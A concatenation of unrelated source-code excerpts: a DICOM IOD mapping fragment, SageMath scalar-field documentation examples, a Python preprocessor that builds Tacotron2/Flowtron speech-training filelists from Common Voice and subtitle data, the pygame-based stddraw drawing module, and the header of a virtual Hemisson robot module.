'ENHANCED CT IMAGE IOD': ['Study'],
'X-RAY RADIATION DOSE SR IOD': ['Study'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Study'],
'PROCEDURE LOG IOD': ['Study'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Study'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Study'],
'STEREOMETRIC RELATIONSHIP IOD': ['Study'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Study'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Study'],
'VL ENDOSCOPIC IMAGE IOD': ['Study'],
'KERATOMETRY MEASUREMENTS IOD': ['Study'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE | |
M,
Open subset U of the 2-dimensional topological manifold M)
sage: s = f*g ; s
Scalar field f*g on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
f*g: U --> R
(x, y) |--> x*y/(x^2 + y^2 + 1)
on W: (u, v) |--> u*v/(u^4 + v^4 + (2*u^2 + 1)*v^2 + u^2)
sage: s == f.restrict(U)*g
True
Scalar fields can be divided (pointwise division)::
sage: s = f/c ; s
Scalar field f/c on the 2-dimensional topological manifold M
sage: s.display()
f/c: M --> R
on U: (x, y) |--> 1/(a*x^2 + a*y^2 + a)
on V: (u, v) |--> (u^2 + v^2)/(a*u^2 + a*v^2 + a)
sage: s = g/h ; s
Scalar field g/h on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
g/h: U --> R
(x, y) |--> x*y/H(x, y)
on W: (u, v) |--> u*v/((u^4 + 2*u^2*v^2 + v^4)*H(u/(u^2 + v^2), v/(u^2 + v^2)))
sage: s = f/g ; s
Scalar field f/g on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
f/g: U --> R
(x, y) |--> 1/(x*y^3 + (x^3 + x)*y)
on W: (u, v) |--> (u^6 + 3*u^4*v^2 + 3*u^2*v^4 + v^6)/(u*v^3 + (u^3 + u)*v)
sage: s == f.restrict(U)/g
True
For scalar fields defined on a single chart domain, we may perform some
arithmetics with symbolic expressions involving the chart coordinates::
sage: s = g + x^2 - y ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> x^2 + (x - 1)*y
on W: (u, v) |--> -(v^3 - u^2 + (u^2 - u)*v)/(u^4 + 2*u^2*v^2 + v^4)
::
sage: s = g*x ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> x^2*y
on W: (u, v) |--> u^2*v/(u^6 + 3*u^4*v^2 + 3*u^2*v^4 + v^6)
::
sage: s = g/x ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> y
on W: (u, v) |--> v/(u^2 + v^2)
sage: s = x/g ; s
Scalar field on the Open subset U of the 2-dimensional topological
manifold M
sage: s.display()
U --> R
(x, y) |--> 1/y
on W: (u, v) |--> (u^2 + v^2)/v
.. RUBRIC:: Examples with SymPy as the symbolic engine
From now on, we ask that all symbolic calculus on manifold `M` are
performed by SymPy::
sage: M.set_calculus_method('sympy')
We define `f` as above::
sage: f = M.scalar_field({c_xy: 1/(1+x^2+y^2), c_uv: (u^2+v^2)/(1+u^2+v^2)},
....: name='f') ; f
Scalar field f on the 2-dimensional topological manifold M
sage: f.display() # notice the SymPy display of exponents
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
sage: type(f.coord_function(c_xy).expr())
<class 'sympy.core.power.Pow'>
The scalar field `g` defined on `U`::
sage: g = U.scalar_field({c_xy: x*y}, name='g')
sage: g.display() # again notice the SymPy display of exponents
g: U --> R
(x, y) |--> x*y
on W: (u, v) |--> u*v/(u**4 + 2*u**2*v**2 + v**4)
Definition on a single chart and subsequent completion::
sage: f = M.scalar_field(1/(1+x^2+y^2), chart=c_xy, name='f')
sage: f.add_expr((u^2+v^2)/(1+u^2+v^2), chart=c_uv)
sage: f.display()
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
Definition without any coordinate expression and subsequent completion::
sage: f = M.scalar_field(name='f')
sage: f.add_expr(1/(1+x^2+y^2), chart=c_xy)
sage: f.add_expr((u^2+v^2)/(1+u^2+v^2), chart=c_uv)
sage: f.display()
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
Use of :meth:`add_expr_by_continuation`::
sage: f = M.scalar_field(1/(1+x^2+y^2), chart=c_xy, name='f')
sage: f.add_expr_by_continuation(c_uv, U.intersection(V))
sage: f.display()
f: M --> R
on U: (x, y) |--> 1/(x**2 + y**2 + 1)
on V: (u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
A scalar field defined by some unspecified function of the
coordinates::
sage: h = U.scalar_field(function('H')(x, y), name='h') ; h
Scalar field h on the Open subset U of the 2-dimensional topological
manifold M
sage: h.display()
h: U --> R
(x, y) |--> H(x, y)
on W: (u, v) |--> H(u/(u**2 + v**2), v/(u**2 + v**2))
The coordinate expression in a given chart is obtained via the method
:meth:`expr`, which in the present context, returns a SymPy object::
sage: f.expr(c_uv)
(u**2 + v**2)/(u**2 + v**2 + 1)
sage: type(f.expr(c_uv))
<class 'sympy.core.mul.Mul'>
The method :meth:`coord_function` returns instead a function of the
chart coordinates, i.e. an instance of
:class:`~sage.manifolds.chart_func.ChartFunction`::
sage: f.coord_function(c_uv)
(u**2 + v**2)/(u**2 + v**2 + 1)
sage: type(f.coord_function(c_uv))
<class 'sage.manifolds.chart_func.ChartFunctionRing_with_category.element_class'>
sage: f.coord_function(c_uv).display()
(u, v) |--> (u**2 + v**2)/(u**2 + v**2 + 1)
The value returned by the method :meth:`expr` is actually the coordinate
expression of the chart function::
sage: f.expr(c_uv) is f.coord_function(c_uv).expr()
True
We may ask for the ``SR`` representation of the coordinate function::
sage: f.coord_function(c_uv).expr('SR')
(u^2 + v^2)/(u^2 + v^2 + 1)
A constant scalar field with SymPy representation::
sage: c = M.constant_scalar_field(2, name='c')
sage: c.display()
c: M --> R
on U: (x, y) |--> 2
on V: (u, v) |--> 2
sage: type(c.expr(c_xy))
<class 'sympy.core.numbers.Integer'>
The constant value can be some unspecified parameter::
sage: var('a')
a
sage: c = M.constant_scalar_field(a, name='c')
sage: c.display()
c: M --> R
on U: (x, y) |--> a
on V: (u, v) |--> a
sage: type(c.expr(c_xy))
<class 'sympy.core.symbol.Symbol'>
The zero scalar field::
sage: zer = M.constant_scalar_field(0) ; zer
Scalar field zero on the 2-dimensional topological manifold M
sage: zer.display()
zero: M --> R
on U: (x, y) |--> 0
on V: (u, v) |--> 0
sage: type(zer.expr(c_xy))
<class 'sympy.core.numbers.Zero'>
sage: zer is M.zero_scalar_field()
True
Action of scalar fields on manifold's points::
sage: N = M.point((0,0), chart=c_uv) # the North pole
sage: S = M.point((0,0), chart=c_xy) # the South pole
sage: E = M.point((1,0), chart=c_xy) # a point at the equator
sage: f(N)
0
sage: f(S)
1
sage: f(E)
1/2
sage: h(E)
H(1, 0)
sage: c(E)
a
sage: zer(E)
0
A scalar field can be compared to another scalar field::
sage: f == g
False
...to a symbolic expression::
sage: f == x*y
False
sage: g == x*y
True
sage: c == a
True
...to a number::
sage: f == 2
False
sage: zer == 0
True
...to anything else::
sage: f == M
False
Standard mathematical functions are implemented::
sage: sqrt(f)
Scalar field sqrt(f) on the 2-dimensional topological manifold M
sage: sqrt(f).display()
sqrt(f): M --> R
on U: (x, y) |--> 1/sqrt(x**2 + y**2 + 1)
on V: (u, v) |--> sqrt(u**2 + v**2)/sqrt(u**2 + v**2 + 1)
::
sage: tan(f)
Scalar field tan(f) on the 2-dimensional topological manifold M
sage: tan(f).display()
tan(f): M --> R
on U: (x, y) |--> tan(1/(x**2 + y**2 + 1))
on V: (u, v) |--> tan((u**2 + v**2)/(u**2 + v**2 + 1))
.. RUBRIC:: Arithmetics of scalar fields with SymPy
Scalar fields on `M` (resp. `U`) belong to the algebra `C^0(M)`
(resp. `C^0(U)`)::
sage: f.parent()
Algebra of scalar fields on the 2-dimensional topological manifold M
sage: f.parent() is M.scalar_field_algebra()
True
sage: g.parent()
Algebra of scalar fields on the Open subset U of the 2-dimensional
topological manifold M
sage: g.parent() is U.scalar_field_algebra()
True
Consequently, scalar fields can be added::
sage: s = f + c ; s
Scalar field f+c on the 2-dimensional topological manifold M
sage: s.display()
f+c: M --> R
on U: (x, y) |--> (a*x**2 + a*y**2 + a + 1)/(x**2 + y**2 + 1)
on V: (u, v) |--> (a*u**2 + a*v**2 + a + u**2 + v**2)/(u**2 + v**2 + 1)
and subtracted::
sage: s = f - c ; | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import pandas as pd
from tqdm import tqdm
import re
from multiprocessing import Pool
from modules.Global.variable import Var
from modules.preprocessing.cleaner import DataCleaner
from modules.preprocessing.time import TimePreprocessor
import librosa
class DataPreprocessor:
'''
Class used to make data preprocessor
'''
END_CHARS = Var().END_CHARS
NB_LIMIT_FILE_CLUSTER = Var().NB_LIMIT_FILE_CLUSTER
def __init__(self, dataframe=None):
self.dataframe = dataframe
def _find_user_information(self, user_id, user_column):
'''
Method used to get user data
Parameters
----------
user_id : string
User ID
user_column : string
Name of the column containing user name, id or anything else...
Returns
-------
tuple
User ID and dataframe realted to the USer ID given
'''
return user_id, self.dataframe[self.dataframe[user_column]==user_id]
def _find_max_user(self, list_user, list_number_element, list_option_element, option):
'''
Find the user who have the biggest amount of elements
Parameters
----------
list_unique_user : list
list containg list of [user, number of element, list_option_element=None]
option : string
option use to specify parameter on optional list from list_unique_user to find max user
Returns
-------
string
String containg user who has te biggest amount of elements
'''
if option is None:
biggest_user = list_user[list_number_element.index(max(list_number_element))]
else:
index_option = [i for i,x in enumerate(list_option_element) if str(x).lower() == option]
list_user_option = [list_user[index] for index in index_option]
list_number_element_option = [list_number_element[index] for index in index_option]
biggest_user = list_user_option[list_number_element_option.index(max(list_number_element_option))]
return biggest_user
def convert_data_mcv_to_taflowtron(self,
user_column,
path_column,
element_column,
data_directory,
data_directory_preprocessed,
cleaner,
tts,
user_id=None,
option_column=None,
option_value=None,
format_conversion=".wav",
speaker_whitelist=None,
duration_minimum_user=300):
'''
From a dataframe containg audio information in Mozilla Common voice format, convert it
into taflowtron fileslist format
Parameters
----------
user_column : string
Name of the column containing user name, id or anything else...
path_column : string
Name of the column containing file path
element_column : string
Name of the column containg the element of the user
data_directory : string
directory containing audio data
data_directory_preprocessed : string
directory containing futur preprocessed audio data
cleaner : dataframe
table containing regex and substitution
user_id : list
list of user to select
tts : string
name of the tts to use; flowtron or tacotron2
option_column : string
Name of an additional column to consider to find user
option_value : string
option value to use to specify parameter on optional list from list_unique_user to find max user
format_conversion : string
format used by tacotron2 training (always .wav)
speaker_whitelist : list
list of speaker ID to use
speaker_whitelist : int
minimum duration in seconds of user
Returns
-------
Pandas dataframe
taflowtron filelist (dataframe or list), dataframe containg information about user, number of speaker
'''
if speaker_whitelist is None:
list_user_id = list(self.dataframe[user_column].unique())
else:
list_user_id = speaker_whitelist
#Fix number of max parallelized process
nb_max_parallelized_process = min(len(list_user_id), os.cpu_count())
list_arg = [(user_id, user_column) for user_id in list_user_id]
with Pool(processes=nb_max_parallelized_process) as pool:
res = pool.starmap(self._find_user_information, tqdm(list_arg))
list_user = []
list_number_element = []
list_user_df = []
list_option_element = []
for index in range(len(res)):
list_user.append(res[index][0])
list_number_element.append(res[index][1].shape[0])
list_user_df.append(res[index][1])
if option_column is not None: list_option_element.append(list(list_user_df[index][option_column].unique())[0])
data_info = pd.DataFrame({user_column:list_user,element_column:list_number_element,option_column:list_option_element},columns=[user_column, element_column, option_column])
if tts == "tacotron2":
user = self._find_max_user(list_user, list_number_element, list_option_element, option_value)
table = self.dataframe[self.dataframe[user_column]==user][[path_column,element_column]]
table[element_column] = DataCleaner().clean_text(data=table[element_column],
cleaner=cleaner)
table_filelist = table.apply(lambda x : os.path.join(data_directory_preprocessed,os.path.splitext(x[path_column])[0]+format_conversion) + "|" + x[element_column], axis=1).reset_index(drop=True)
return table_filelist, data_info, 0
if tts == "flowtron":
list_audio_path = []
list_subtitle = []
list_speaker_id = []
list_duration = []
dir_to_create = []
list_original_path = []
nb_user = 0
for index, user in enumerate(tqdm(list_user)):
table = list_user_df[index][[path_column,element_column]]
list_original_path_user = [os.path.join(data_directory,audio_path) for audio_path in table[path_column]]
duration_user = sum([librosa.get_duration(filename=file) for file in list_original_path_user])
list_duration.append(duration_user)
if duration_user >= duration_minimum_user:
len_table = table.shape[0]
table[element_column] = DataCleaner().clean_text(data=table[element_column],
cleaner=cleaner)
nb_part = len_table // (self.NB_LIMIT_FILE_CLUSTER + 1)
part_extension = ["part_" + str(index) for index in range(nb_part+1)]
dir_to_create += [os.path.join(data_directory_preprocessed,user,part) for part in part_extension]
list_original_path += list_original_path_user
list_audio_path += [os.path.join(data_directory_preprocessed,user,part_extension[index//(self.NB_LIMIT_FILE_CLUSTER+1)],os.path.splitext(list(table[path_column])[index])[0]+format_conversion) for index in range(len_table)]
list_subtitle += list(table[element_column])
list_speaker_id += [str(index)]*len_table
nb_user += 1
else:
print("Total user duration is: " + str(duration_user) + " second(s) from: " + str(user) + " is below to: " + str(duration_minimum_user) + " second(s), this user will be filtered out.")
data_info["Duration"] = list_duration
return list_audio_path, list_subtitle, list_speaker_id, data_info, nb_user, dir_to_create, list_original_path
def _useless_data(self, data):
'''
Find data index to keep for training taflowtron by removing useless data
Parameters
----------
data : list
list of data containing string
Returns
-------
list
list of index to remove from data
'''
index_to_remove = [index for index,element in enumerate(data) if len(element) > 0 if element[0]=='[']
index_to_remove += [index for index,element in enumerate(data) if len(element) == 0]
return index_to_remove
def _concatenate_subtitle(self, list_time, list_subtitle, max_limit_duration, min_limit_duration):
'''
Concatenate subtitle to get long sentences and not cut sentences
Parameters
----------
list_time : list
list of data containing time
list_subtitle : list
list of data containing string
max_limit_duration : int
maximum audio length/duration authorized
min_limit_duration : int
minimum audio length/duration authorized
Returns
-------
None.
'''
align_duration = 10
new_list_time = []
new_list_subtitle = []
index = 0
while index < len(list_subtitle):
compt = 0
subtitle = list_subtitle[index]
beg_time = list_time[index][0]
end_time = list_time[index][1]
if index+compt < len(list_subtitle)-1 and (list_time[index+compt][1] - list_time[index+compt][0]) != align_duration:
#If not out of index range and duration is not the aligned 10 ms one
while (list_time[index+compt+1][1] - beg_time) <= max_limit_duration \
and list_time[index+compt][1] == list_time[index+compt+1][0] \
and list_subtitle[index+compt][-1] not in self.END_CHARS:
#Concatenate next subtitles if:
#If limit of 10 second
#If beginning of next timestamp is the end of the actual timestamp or FOR FUTURE MAYBE ADD CONCATENATION IF DIIF < 10 MS
#If actual subtitle does not end with an end chars
if (list_time[index+compt+1][1] - list_time[index+compt+1][0]) != align_duration:
#If duration is not 10ms, concatenation is done
subtitle += " " + list_subtitle[index+compt+1]
end_time = list_time[index+compt+1][1]
compt += 1
if index+compt >= len(list_subtitle)-1:
break
new_list_time.append((beg_time,end_time))
new_list_subtitle.append(subtitle)
index += compt + 1
#Remove audio smaller than min_limit_duration
new_list_subtitle = [subtitle for index,subtitle in enumerate(new_list_subtitle) if new_list_time[index][1] - new_list_time[index][0] >= min_limit_duration]
new_list_time = [time for time in new_list_time if time[1] - time[0] >= min_limit_duration]
return new_list_time, new_list_subtitle
def get_info_from_vtt(self, data, cleaner, concatenate=False, max_limit_duration=10000, min_limit_duration=1000, use_youtube_transcript_api=True):
'''
Get time of subtitile and subtitle
Parameters
----------
data : list
list of vtt data
cleaner : dataframe
table containing regex and substitution
concatenate : boolean
concatenate vtt sentences/subtitles by using time and end characters to make bigger sentence/subtitle
max_limit_duration : int
maximum audio length/duration authorized
min_limit_duration : int
minimum audio length/duration authorized
use_youtube_transcript_api : boolean
use or not youtube_transcript_api
Returns
-------
list
list of list containing start and end time of the subtitle and the subtitle [(xxxx,xxxx),xxxx]
'''
list_time = []
list_subtitle = []
if use_youtube_transcript_api:
list_subtitle = [element['text'] for element in data]
list_time = [(element['start']*1000,(element['start']+element['duration'])*1000) for element in data]
else:
index = 0
while index < len(data):
element = data[index]
compt = 1
subtitle = ''
if re.search(r'\d\d\:\d\d\:\d\d\.\d\d\d --> \d\d\:\d\d\:\d\d\.\d\d\d', element):
list_time.append(re.findall(r'(\d\d\:\d\d\:\d\d\.\d\d\d) --> (\d\d\:\d\d\:\d\d\.\d\d\d)', element))
while data[index + compt] != '\n':
subtitle += data[index + compt]
compt += 1
list_subtitle.append(subtitle)
index += 1
list_time = [(TimePreprocessor().convert_time_format(time[0][0]),TimePreprocessor().convert_time_format(time[0][1])) for time in list_time]
list_subtitle = DataCleaner().clean_text(data=list_subtitle,
cleaner=cleaner)
index_to_remove = self._useless_data(list_subtitle)
list_time = [element for index,element in enumerate(list_time) if index not in index_to_remove]
list_subtitle = [element for index,element in enumerate(list_subtitle) if index not in index_to_remove]
'''
Concatenation of sentence/subtitle
'''
if concatenate:
list_time, list_subtitle = self._concatenate_subtitle(list_time, list_subtitle, max_limit_duration, min_limit_duration)
return list_time, list_subtitle
def get_ITN_data(self, data_text, data_option=None, language="en"):
'''
Find ITN/symbols elements in text
Parameters
----------
data_text : list
list containing text
data_option : list
list containing other data for instance audio path related to the data_text
regex_match : string
regex to use to match required symbols
language : string
language to match word regarding language
Returns
-------
list
list of ITN/symbols found
'''
regex_match_only_digit = re.compile('^\d+\.?$')
if language == "en":
regex_match=re.compile('[^a-zA-Z-\']+')
regex_match_punctuation = re.compile('[a-zA-Z]{3,}[,.;:]')
if language == "fr":
regex_match=re.compile('[^ABCDEFGHIJKLMNOPQRSTUVWXYZÉÈÊËÂÀÄÙÛÜÎÏÔÖŸÆŒÇabcdefghijklmnopqrstuvwxyzéèêëâàäùûüîïôöÿæœç\-\']+')
regex_match_punctuation = re.compile('[ABCDEFGHIJKLMNOPQRSTUVWXYZÉÈÊËÂÀÄÙÛÜÎÏÔÖŸÆŒÇabcdefghijklmnopqrstuvwxyzéèêëâàäùûüîïôöÿæœç\-\']{3,}[,.;:]')
if data_option is not None:
return [word + "\t" + sentence + "\t" + data_option[index] for index,sentence in | |
<reponame>JaydenYL/Projects<gh_stars>1-10
"""
stddraw.py
The stddraw module defines functions that allow the user to create a
drawing. A drawing appears on the canvas. The canvas appears
in the window. As a convenience, the module also imports the
commonly used Color objects defined in the color module.
"""
import time
import os
import sys
import pygame
import pygame.gfxdraw
import pygame.font
import color
import string
if (sys.hexversion < 0x03000000):
import Tkinter
import tkMessageBox
import tkFileDialog
else:
import tkinter as Tkinter
import tkinter.messagebox as tkMessageBox
import tkinter.filedialog as tkFileDialog
#-----------------------------------------------------------------------
# Define colors so clients need not import the color module.
from color import WHITE
from color import BLACK
from color import RED
from color import GREEN
from color import BLUE
from color import CYAN
from color import MAGENTA
from color import YELLOW
from color import DARK_RED
from color import DARK_GREEN
from color import DARK_BLUE
from color import GRAY
from color import DARK_GRAY
from color import LIGHT_GRAY
from color import ORANGE
from color import VIOLET
from color import PINK
from color import BOOK_BLUE
from color import BOOK_LIGHT_BLUE
from color import BOOK_RED
#-----------------------------------------------------------------------
# Default Sizes and Values
_BORDER = 0.0
#_BORDER = 0.05
_DEFAULT_XMIN = 0.0
_DEFAULT_XMAX = 1.0
_DEFAULT_YMIN = 0.0
_DEFAULT_YMAX = 1.0
_DEFAULT_CANVAS_SIZE = 512
_DEFAULT_PEN_RADIUS = .005 # Maybe change this to 0.0 in the future.
_DEFAULT_PEN_COLOR = color.BLACK
_DEFAULT_FONT_FAMILY = 'Helvetica'
_DEFAULT_FONT_SIZE = 12
_xmin = None
_ymin = None
_xmax = None
_ymax = None
_fontFamily = _DEFAULT_FONT_FAMILY
_fontSize = _DEFAULT_FONT_SIZE
_canvasWidth = float(_DEFAULT_CANVAS_SIZE)
_canvasHeight = float(_DEFAULT_CANVAS_SIZE)
_penRadius = None
_penColor = _DEFAULT_PEN_COLOR
_keysTyped = []
# Has the window been created?
_windowCreated = False
#-----------------------------------------------------------------------
# Begin added by <NAME>
#-----------------------------------------------------------------------
# Keep track of mouse status
# Has the mouse been left-clicked since the last time we checked?
_mousePressed = False
# The position of the mouse as of the most recent mouse click
_mousePos = None
#-----------------------------------------------------------------------
# End added by <NAME>
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
def _pygameColor(c):
"""
Convert c, an object of type color.Color, to an equivalent object
of type pygame.Color. Return the result.
"""
r = c.getRed()
g = c.getGreen()
b = c.getBlue()
return pygame.Color(r, g, b)
#-----------------------------------------------------------------------
# Private functions to scale and factor X and Y values.
def _scaleX(x):
return _canvasWidth * (x - _xmin) / (_xmax - _xmin)
def _scaleY(y):
return _canvasHeight * (_ymax - y) / (_ymax - _ymin)
def _factorX(w):
return w * _canvasWidth / abs(_xmax - _xmin)
def _factorY(h):
return h * _canvasHeight / abs(_ymax - _ymin)
#-----------------------------------------------------------------------
# Begin added by <NAME>
#-----------------------------------------------------------------------
def _userX(x):
return _xmin + x * (_xmax - _xmin) / _canvasWidth
def _userY(y):
return _ymax - y * (_ymax - _ymin) / _canvasHeight
#-----------------------------------------------------------------------
# End added by <NAME>
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
def setCanvasSize(w=_DEFAULT_CANVAS_SIZE, h=_DEFAULT_CANVAS_SIZE):
"""
Set the size of the canvas to w pixels wide and h pixels high.
Calling this function is optional. If you call it, you must do
so before calling any drawing function.
"""
global _background
global _surface
global _canvasWidth
global _canvasHeight
global _windowCreated
if _windowCreated:
raise Exception('The stddraw window already was created')
if (w < 1) or (h < 1):
raise Exception('width and height must be positive')
_canvasWidth = w
_canvasHeight = h
_background = pygame.display.set_mode([w, h])
pygame.display.set_caption('stddraw window (r-click to save)')
_surface = pygame.Surface((w, h))
_surface.fill(_pygameColor(WHITE))
_windowCreated = True
def setXscale(min=_DEFAULT_XMIN, max=_DEFAULT_XMAX):
"""
Set the x-scale of the canvas such that the minimum x value
is min and the maximum x value is max.
"""
global _xmin
global _xmax
min = float(min)
max = float(max)
if min >= max:
raise Exception('min must be less than max')
size = max - min
_xmin = min - _BORDER * size
_xmax = max + _BORDER * size
def setYscale(min=_DEFAULT_YMIN, max=_DEFAULT_YMAX):
"""
Set the y-scale of the canvas such that the minimum y value
is min and the maximum y value is max.
"""
global _ymin
global _ymax
min = float(min)
max = float(max)
if min >= max:
raise Exception('min must be less than max')
size = max - min
_ymin = min - _BORDER * size
_ymax = max + _BORDER * size
def setPenRadius(r=_DEFAULT_PEN_RADIUS):
"""
Set the pen radius to r, thus affecting the subsequent drawing
of points and lines. If r is 0.0, then points will be drawn with
the minimum possible radius and lines with the minimum possible
width.
"""
global _penRadius
r = float(r)
if r < 0.0:
raise Exception('Argument to setPenRadius() must be non-neg')
_penRadius = r * float(_DEFAULT_CANVAS_SIZE)
def setPenColor(c=_DEFAULT_PEN_COLOR):
"""
Set the pen color to c, where c is an object of class color.Color.
c defaults to stddraw.BLACK.
"""
global _penColor
_penColor = c
def setFontFamily(f=_DEFAULT_FONT_FAMILY):
"""
Set the font family to f (e.g. 'Helvetica' or 'Courier').
"""
global _fontFamily
_fontFamily = f
def setFontSize(s=_DEFAULT_FONT_SIZE):
"""
Set the font size to s (e.g. 12 or 16).
"""
global _fontSize
_fontSize = s
#-----------------------------------------------------------------------
def _makeSureWindowCreated():
global _windowCreated
if not _windowCreated:
setCanvasSize()
_windowCreated = True
#-----------------------------------------------------------------------
# Functions to draw shapes, text, and images on the background canvas.
def _pixel(x, y):
"""
Draw on the background canvas a pixel at (x, y).
"""
_makeSureWindowCreated()
xs = _scaleX(x)
xy = _scaleY(y)
pygame.gfxdraw.pixel(
_surface,
int(round(xs)),
int(round(xy)),
_pygameColor(_penColor))
def point(x, y):
"""
Draw on the background canvas a point at (x, y).
"""
_makeSureWindowCreated()
x = float(x)
y = float(y)
# If the radius is too small, then simply draw a pixel.
if _penRadius <= 1.0:
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.ellipse(
_surface,
_pygameColor(_penColor),
pygame.Rect(
xs-_penRadius,
ys-_penRadius,
_penRadius*2.0,
_penRadius*2.0),
0)
def _thickLine(x0, y0, x1, y1, r):
"""
Draw on the background canvas a line from (x0, y0) to (x1, y1).
Draw the line with a pen whose radius is r.
"""
xs0 = _scaleX(x0)
ys0 = _scaleY(y0)
xs1 = _scaleX(x1)
ys1 = _scaleY(y1)
if (abs(xs0-xs1) < 1.0) and (abs(ys0-ys1) < 1.0):
filledCircle(x0, y0, r)
return
xMid = (x0+x1)/2
yMid = (y0+y1)/2
_thickLine(x0, y0, xMid, yMid, r)
_thickLine(xMid, yMid, x1, y1, r)
def line(x0, y0, x1, y1):
"""
Draw on the background canvas a line from (x0, y0) to (x1, y1).
"""
THICK_LINE_CUTOFF = 3 # pixels
_makeSureWindowCreated()
x0 = float(x0)
y0 = float(y0)
x1 = float(x1)
y1 = float(y1)
lineWidth = _penRadius * 2.0
if lineWidth == 0.0: lineWidth = 1.0
if lineWidth < THICK_LINE_CUTOFF:
x0s = _scaleX(x0)
y0s = _scaleY(y0)
x1s = _scaleX(x1)
y1s = _scaleY(y1)
pygame.draw.line(
_surface,
_pygameColor(_penColor),
(x0s, y0s),
(x1s, y1s),
int(round(lineWidth)))
else:
_thickLine(x0, y0, x1, y1, _penRadius/_DEFAULT_CANVAS_SIZE)
def circle(x, y, r):
"""
Draw on the background canvas a circle of radius r centered on
(x, y).
"""
_makeSureWindowCreated()
x = float(x)
y = float(y)
r = float(r)
ws = _factorX(2.0*r)
hs = _factorY(2.0*r)
# If the radius is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.ellipse(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs-ws/2.0, ys-hs/2.0, ws, hs),
int(round(_penRadius)))
def filledCircle(x, y, r):
"""
Draw on the background canvas a filled circle of radius r
centered on (x, y).
"""
_makeSureWindowCreated()
x = float(x)
y = float(y)
r = float(r)
ws = _factorX(2.0*r)
hs = _factorY(2.0*r)
# If the radius is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.ellipse(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs-ws/2.0, ys-hs/2.0, ws, hs),
0)
def rectangle(x, y, w, h):
"""
Draw on the background canvas a rectangle of width w and height h
whose lower left point is (x, y).
"""
global _surface
_makeSureWindowCreated()
x = float(x)
y = float(y)
w = float(w)
h = float(h)
ws = _factorX(w)
hs = _factorY(h)
# If the rectangle is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.rect(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs, ys-hs, ws, hs),
int(round(_penRadius)))
def filledRectangle(x, y, w, h):
"""
Draw on the background canvas a filled rectangle of width w and
height h whose lower left point is (x, y).
"""
global _surface
_makeSureWindowCreated()
x = float(x)
y = float(y)
w = float(w)
h = float(h)
ws = _factorX(w)
hs = _factorY(h)
# If the rectangle is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.rect(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs, ys-hs, ws, hs),
0)
def square(x, y, r):
"""
Draw on the background canvas a square whose sides are of length
| |
################################################################################
#
# vHemisson.py
#
""" Virtual Hemisson Robot.
Virtual Hemisson Robot shadows the physical Hemisson robot including all
supported I2C modules.
vHemisson in compatabile with Hemisson's HemiOS v1.5RNe+ operating system.
Author: <NAME>
Email: <EMAIL>
URL: http://www.roadnarrowsrobotics.com
Date: 2006.03.07
Copyright (C) 2006. RoadNarrows LLC.
"""
#
# All Rights Reserved
#
# Permission is hereby granted, without written agreement and without
# license or royalty fees, to use, copy, modify, and distribute this
# software and its documentation for any purpose, provided that
# (1) The above copyright notice and the following two paragraphs
# appear in all copies of the source code and (2) redistributions
# including binaries reproduces these notices in the supporting
# documentation. Substantial modifications to this software may be
# copyrighted by their authors and need not follow the licensing terms
# described here, provided that the new terms are clearly indicated in
# all files where they apply.
#
# IN NO EVENT SHALL THE AUTHOR, ROADNARROWS LLC, OR ANY MEMBERS/EMPLOYEES
# OF ROADNARROW LLC OR DISTRIBUTORS OF THIS SOFTWARE BE LIABLE TO ANY
# PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
# DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,
# EVEN IF THE AUTHORS OR ANY OF THE ABOVE PARTIES HAVE BEEN ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHOR AND ROADNARROWS LLC SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
# "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
################################################################################
import time
import threading as thread
import math
import re
import tkinter as tk
import Fusion.Utils.Tools as utils
